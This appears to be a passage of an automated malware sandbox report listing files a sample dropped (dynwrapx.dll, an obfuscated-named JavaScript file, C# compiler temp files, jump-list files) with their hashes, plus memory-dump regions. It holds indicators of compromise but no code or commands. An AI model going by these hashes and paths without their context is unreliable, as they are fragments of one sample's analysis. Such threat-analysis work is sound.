c8733c93cc5aaf5ca206d06af22ee8dbdec764fb5085019a6a9181feb9dfdee6

SHA512
f530dc0d024a5a3b8903ffaaa41b608a5ccdd6da4ba1949f2c2e55a9fca475fec5c8d2119b5763cabe7ef1c3788fb9dcac621869db51d65b1d83cfe404fb4c27

Download Submit
C:\Users\Admin\AppData\Local\Temp\dynwrapx.dll

Filesize
13KB

MD5
0a235e8362613509efd31bfdbb22f978

SHA1
8bcb0297001dfd4963e8d17270ad0d2024a96912

SHA256
175c6cc0a98c16f18e333b5622415d3d962a5d1c05044d34823c8541d6abfcd5

SHA512
bb2cf2457ba063c971c9944f9a6fda4a89eab80265e270f6371a826bdfc753a62828c83f984897127f213837adb8f90956263dd51823e270c5081fafea630db4

Download Submit
C:\Users\Admin\AppData\Local\a858d4fe0.js

Filesize
56KB

MD5
cb0b3aa58373b87e080e433a5574ad8f

SHA1
361eee36a9f713a6137379eae1b2367ac8de4656

SHA256
5675cbadab71a1c16bd15be57cc29fc3f67a73ba16efa6d7fd239dba849cd240

SHA512
3a5e893956aa54c213bb79a6a669c4f379b47a892eedd618e58cebf26eacf24b4470c04394d585e91d6bcbd0a9865ca6c98d18a9597cf9d6177a64b733c9ad44

Download Submit
C:\Users\Admin\AppData\Local\dynwrapx.dll

Filesize
13KB

MD5
ca820517f8fd74d21944d846df6b7c20

SHA1
1f87eeb37156d64de97d042b9bcfbaf185f8737d

SHA256
1b5eb6d4680f7d4da7e2a1a1060b9f13565e082346e375a92244bb55672d49d7

SHA512
27e83483f9dd50b2f897b5b93171b17c0e78719b6f05070c7ef4d69fb80f31cb1342b50685e43a7401fc13e56c83d5a52ed7ccfb69ac5bd3c33461fa10f3985a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NIJAR15IC1G3BOHAG5YA.temp

Filesize
7KB

MD5
4275d03706d47514563f384866af35dd

SHA1
9c6d0a46641d8131d54b6a3d1f33ac0b4fc43d1d

SHA256
93e83b1e2cde7e8efbdb703515b207ff4e314c5bd250efea17da175ffb78dfa5

SHA512
e07ad94ca3d0a202810c692e78849d8c5dcaac7b972e286b6cb1789b4dc59c4c8126b1674c0ec5caaefee08264a4da0e437b222b71ace675d0e53d2c23596c30

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
4275d03706d47514563f384866af35dd

SHA1
9c6d0a46641d8131d54b6a3d1f33ac0b4fc43d1d

SHA256
93e83b1e2cde7e8efbdb703515b207ff4e314c5bd250efea17da175ffb78dfa5

SHA512
e07ad94ca3d0a202810c692e78849d8c5dcaac7b972e286b6cb1789b4dc59c4c8126b1674c0ec5caaefee08264a4da0e437b222b71ace675d0e53d2c23596c30

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\0hbjkxcw.0.cs

Filesize
7KB

MD5
e066db88e6449f080d05d141f75699cc

SHA1
b5b068723dda77943d5dfc71368090da414d0f89

SHA256
bbfe63aff655c41a117fd47da963920543e09f5e9789c68dfd5b319dc1c63605

SHA512
d3d2809b6c8e932254be007eb6688c8388063298315436522aaa5b7cd18ebe93552f74c20934010d97e0f2cae1c39e9d1b723a750538c376812bbb251268ba74

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\0hbjkxcw.cmdline

Filesize
415B

MD5
a86974e521d1f9d417644c8a4cbf7114

SHA1
f8cea6ad687753b576f42bfe0009efdb363ab48f

SHA256
fda8de5233ee4397348a21cdad05433f4f5d41d00b5e7582a3a5be65f13ddc13

SHA512
4a44f282ca439552a47b0987d8ef3694ec1435141cc5abfad4f49929971c7dc2d61d3b9fa83d6eafcf12c382d2c9e49304cc5304e16afa86cb9c962cd56a18b0

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC8585.tmp

Filesize
652B

MD5
77e290d3d29dc2f3432cbb46d8111758

SHA1
d347586265cfb2c0c14b497335a8bb1358edfc20

SHA256
a7508cc269314fbb19ce24e53f5156cc754982f237fde8b716a95b6f1fcacea9

SHA512
3e8a9aa7df0b2a5770659f6955cc6bfa231f82270bc1f0dda70d619e97ff1ee7391b3ad05006d9996ad2d6844fb138039a3aea78af0d20e6174a52b5c06a0da1

Download Submit
\Users\Admin\AppData\Local\dynwrapx.dll

Filesize
13KB

MD5
ca820517f8fd74d21944d846df6b7c20

SHA1
1f87eeb37156d64de97d042b9bcfbaf185f8737d

SHA256
1b5eb6d4680f7d4da7e2a1a1060b9f13565e082346e375a92244bb55672d49d7

SHA512
27e83483f9dd50b2f897b5b93171b17c0e78719b6f05070c7ef4d69fb80f31cb1342b50685e43a7401fc13e56c83d5a52ed7ccfb69ac5bd3c33461fa10f3985a

Download Submit
memory/592-114-0x0000000073CD0000-0x000000007427B000-memory.dmp

Filesize
5.7MB

Download
memory/592-96-0x0000000073CD0000-0x000000007427B000-memory.dmp

Filesize
5.7MB

Download
memory/2576-153-0x00000000020E0000-0x0000000002160000-memory.dmp

Filesize
512KB

Download
memory/2900-91-0x00000000025C0000-0x0000000002600000-memory.dmp

Filesize
256KB

Download
memory/2900-90-0x0000000073CD0000-0x000000007427B000-memory.dmp

Filesize
5.7MB

Download
memory/2900-113-0x0000000073CD0000-0x000000007427B000-memory.dmp

Filesize
5.7MB

Download
memory/2900-88-0x0000000073CD0000-0x000000007427B000-memory.dmp

Filesize
5.7MB

Download
memory/2976-116-0x0000000002520000-0x00000000025A0000-memory.dmp

Filesize
512KB

Download
memory/2976-117-0x000007FEF5F10000-0x000007FEF68AD000-memory.dmp

Filesize
9.6MB

Download
memory/2976-120-0x0000000002520000-0x00000000025A0000-memory.dmp

Filesize
512KB

Download
memory/2976-118-0x0000000002520000-0x00000000025A0000-memory.dmp

Filesize
512KB

Download
memory/2976-119-0x0000000002520000-0x00000000025A0000-memory.dmp

Filesize
512KB

Download
memory/2976-115-0x000007FEF5F10000-0x000007FEF68AD000-memory.dmp

Filesize
9.6MB

Download
memory/2976-112-0x00000000024E0000-0x00000000024E8000-memory.dmp

Filesize
32KB

Download
memory/2976-206-0x0000000002680000-0x0000000002688000-memory.dmp

Filesize
32KB

Download
memory/2976-111-0x000000001B2F0000-0x000000001B5D2000-memory.dmp

Filesize
2.9MB

Download
memory/2976-211-0x0000000002520000-0x00000000025A0000-memory.dmp

Filesize
512KB

Download
memory/2976-210-0x000007FEF5F10000-0x000007FEF68AD000-memory.dmp

Filesize
9.6MB

Download
memory/2976-212-0x0000000002520000-0x00000000025A0000-memory.dmp

Filesize
512KB

Download
memory/2976-213-0x0000000002520000-0x00000000025A0000-memory.dmp

Filesize
512KB

Download
memory/2976-214-0x0000000002520000-0x00000000025A0000-memory.dmp

Filesize
512KB

Download